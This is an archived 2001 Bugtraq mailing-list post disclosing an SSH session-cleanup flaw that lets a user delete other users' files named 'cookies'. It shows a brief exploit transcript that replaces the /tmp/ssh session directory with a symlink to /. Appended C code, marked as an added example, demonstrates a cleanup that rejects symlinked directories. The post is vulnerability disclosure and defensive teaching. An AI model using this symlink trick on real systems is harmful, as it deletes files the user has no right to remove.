[20842] in bugtraq


SSH allows deletion of other users files...

daemon@ATHENA.MIT.EDU (zen-parse@gmx.net)
Mon Jun 4 11:19:06 2001

Date: Mon, 4 Jun 2001 22:14:29 +1200 (NZST)
From: <zen-parse@gmx.net>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0106042203210.13293-100000@clarity.local>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

SSH allows deletion of other users' files.
==========================================

You can delete any file on the filesystem you want...

as long as it's called cookies.


Not really a very useful bug, but could cause annoyances to
people who actually like their cookies.

 /home/zen/.netscape/cookies

sample exploit:-

 [root@clarity /root]# touch /cookies;ls /cookies
 /cookies
 [root@clarity /root]# ssh zen@localhost
 zen@localhost's password:
 Last login: Mon Jun  4 20:22:39 2001 from localhost.local
 Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
 [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
 [zen@clarity zen]$ logout
 Connection to localhost closed.
 [root@clarity /root]# ls /cookies
 /bin/ls: /cookies: No such file or directory


--zen-parse
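
The transcript above suggests that session cleanup deletes `cookies` under the `/tmp/ssh-XXXX` path by name with root privileges, so a symlink planted at that path redirects the delete. The following C code is an added example, not part of the original post and not sshd's own code: it shows a cleanup that refuses a symlinked session directory; `safe_cleanup`, `demo` and the temporary paths are hypothetical names constructed for illustration.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper (not sshd code): delete <dir>/cookies only if <dir> is
 * a real directory owned by `owner`. Returns 0 on success, -1 on refusal. */
int safe_cleanup(const char *dir, uid_t owner)
{
    struct stat st;
    /* O_NOFOLLOW: open() fails if the last path component is a symlink. */
    int dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (dfd < 0)
        return -1;
    /* Validate the object that was opened, not the path name. */
    if (fstat(dfd, &st) != 0 || !S_ISDIR(st.st_mode) || st.st_uid != owner) {
        close(dfd);
        return -1;
    }
    /* Resolved relative to dfd, so swapping the path later changes nothing. */
    int rc = unlinkat(dfd, "cookies", 0);
    close(dfd);
    return rc == 0 ? 0 : -1;
}

/* Constructed scenario: bit 0 set = symlinked dir refused and target file
 * kept; bit 1 set = genuine session dir cleaned. Expected result: 3. */
int demo(void)
{
    char base[] = "/tmp/cleanup-demo-XXXXXX", victim[64], file[80], lnk[64];
    int result = 0;
    if (!mkdtemp(base))
        return -1;
    snprintf(victim, sizeof victim, "%s/victim", base);
    snprintf(file, sizeof file, "%s/cookies", victim);
    snprintf(lnk, sizeof lnk, "%s/ssh-link", base);
    if (mkdir(victim, 0700) != 0 || symlink(victim, lnk) != 0)
        return -1;
    close(open(file, O_CREAT | O_WRONLY, 0600));
    if (safe_cleanup(lnk, getuid()) == -1 && access(file, F_OK) == 0)
        result |= 1;
    if (safe_cleanup(victim, getuid()) == 0 && access(file, F_OK) != 0)
        result |= 2;
    unlink(lnk); rmdir(victim); rmdir(base);
    return result;
}
int main(void) { printf("demo() = %d\n", demo()); return 0; }
```

Performing the cleanup with the session user's privileges instead of root's is a complementary measure, since the delete then fails on files that user could not remove anyway.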

